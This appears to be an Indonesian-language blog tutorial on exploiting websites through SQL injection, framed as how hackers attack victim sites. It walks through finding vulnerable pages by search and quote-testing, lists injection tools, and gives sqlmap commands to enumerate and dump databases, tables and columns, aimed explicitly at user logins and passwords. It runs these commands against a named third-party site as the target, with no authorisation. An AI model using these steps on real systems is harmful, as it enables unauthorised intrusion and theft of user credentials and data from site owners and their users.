Website merupakan sebuah aplikasi yang dibangun untuk dapat digunakan
dan diakses oleh semua orang tanpa terkecuali. Kelebihan ini yang
terkadang menjadi boomerang tersendiri bagi websitenya, karena kita
tidak pernah tahu siapa saja yang mengakses, apakah orang tersebut
berniat jahat atau tidak. Berikut ini adalah tahap demi tahap para Hacker Mengeksploitasi Website Korban. 1. Mencari website Vulnerable / Website yang masih terdapat BUG Banyak cara yang dapat digunakan untuk mendapatkan website
vulnerable, bisa menggunakan. Bisa dengan cara manual atau cara
otomatis. Cara manual adalah cara ketika anda akan mengeksploitasi
website – website tujuan anda, contoh ketika praktisi komputer akan
mengeksploitasi website www.websitevulnerable.com, dengan manual halaman demi halaman akan di cek apakah terdapat peringatan mysql error
atau tidak. Sedangkan Cara Otomatis sederhananya dapat dilakukan
menggunakan pencarian di google.com dengan keyword pencarian sebagai
berikut.
Mencari website vulnerableSetelah anda cari akan tampil banyak website, salah satunya adalah website ini
http://www.bible-history.com/subcat.php?id=2
Kita sudah mendapatkan website target yaitu www.bible-history.com, kali ini kita akan mencoba eksploitasi website ini dengan menambahkan aksen atau tanda petik setelah variabel ?id=2 di alamat tersebut. Lihat Contoh Dibawah.
http://www.bible-history.com/subcat.php?id=2′
Apakah akan muncul pesan mysql error atau tidak. Hasilnya seperti gambar dibawah ini.
Tutorial hacking dengan sql injectionHasil error kita dapatkan. artinya website ini masih mempunyai bug, atau vulnerable. Inti dari tahap 1 ini adalah mencoba-coba menyisipkan aksen ‘
pada halaman-halaman website hasil pencarian manual atau otomatis,
apakah terdapat pesan error atau tidak, jika error maka website tersebut
belum aman. 2. Siapkan Tool SQL Injection Dibawah ini adalah macam-macam tool SQL Injection
Nama Tools
Operating Sistem
Download
Havij SQL Injection
Windows
Download
Pangolin – Automated SQL Injection Test Tool
Windows
Download
BSQL Hacker
Windows
Download
Safe3 SQL Injector
Windows
Download
The Mole
Windows
Download
SQLNinja SQL injection
Linux
Download
SQLMAP
Linux / Windows
Download
Masukan perintah berikut untuk melihat daftar database website target
Gambar Tutorial SQLMAP
/* sqlmap.py -u url_target --dbs */
sqlmap.py -u http://www.bible-history.com/subcat.php?id=2 --dbs
/*
Note : Url target tanpa tanda aksen '
Tanda aksen hanya digunakan untuk mengecek apakah suatu website masih error
*/
Hasil yang akan didapat adalah seperti gambar di bawah ini
Gambar Tutorial SQLMAP
Hasil dari perintah adalah sebuah
kumpulan database yang dimiliki website korban. Tahap berikutnya adalah
kita akan mencari informasi – informasi yang ada di dalam database
diatas. Tujuan ini biasanya digunakan para Hacker untuk mencari user dan
password user login pada website.
Masukan perintah berikut untuk melihat daftar Tabel dari database yang dipilih
Hasil yang akan didapat adalah seperti gambar di bawah ini
Gambar Tutorial SQLMAP
Hasil dari perintah adalah sebuah
kumpulan daftar tabel dari database yang dipilih. Tahap berikutnya
adalah kita akan mencari informasi – informasi yang ada di dalam tabel –
tabel diatas.
Masukan perintah berikut untuk melihat informasi Tabel yang dipilih
Gambar Tutorial SQLMAPCATATAN: Berikut adalah beberapa command penting di SQLMAP Untuk melakukan scanning terhadap Target [URL] ./sqlmap.py -u[url] Untuk mendapatkan informasi database Target [URL] ./sqlmap.py -u[url] –dbs Untuk mendapatkan informasi table di database Target [URL] ./sqlmap.py -u [url] –tables -D [database] Untuk mendapatkan informasi kolom didalam table yang ada didatabase Target [URL] ./sqlmap.py -u [url] –columns -T [table name] -D [databasename] Untuk melakukan dump kolom, table dan database Target [URL] ./sqlmap.py -u [url] –dump –columns -T [table name] -D [databasename] Untuk melakukan dump spesifik kolom Target [URL] ./sqlmap.py -u [url] –dump -C [column name] -T [table name] -D [database name]
No comments:
Post a Comment